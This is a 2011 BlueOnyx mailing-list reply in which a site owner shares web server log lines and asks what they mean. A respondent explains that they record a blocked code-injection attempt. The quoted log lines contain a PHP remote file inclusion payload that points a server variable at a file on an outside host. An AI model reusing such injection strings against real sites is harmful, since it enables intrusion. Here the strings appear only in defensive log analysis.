[BlueOnyx:08493] Re: Making sense of log files...
Jeff Folk
jfolk at qzoneinc.com
Fri Sep 16 08:54:53 -05 2011
On Sep 16, 2011, at 8:11 AM, Wayne Michael wrote:
>
> Typically I haven't taken the time to monitor all my log files.
>
> but recently I've been paying more attention to them.
>
> this is the log from dfix:
>
> Warning: Blocking 210.127.253.246
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 301 - "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:38 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:40 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 301 - "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:06 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:24 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
>
>
>
> Not really sure what it means other than it blocked the IP address.
>
> ?p=1693 is a valid link on my site, does that mean this is the page they tried to take over and they are coming from hackorea ?
>
> anything to worry about?
>
> Thanks,
>
> Wayne
That is someone in Korea trying to use a code injection vulnerability, but dfix sensed and blocked it. Go dfix!
Is dfix alive for 5701R?
Thanks;
Jeff
More information about the Blueonyx
mailing list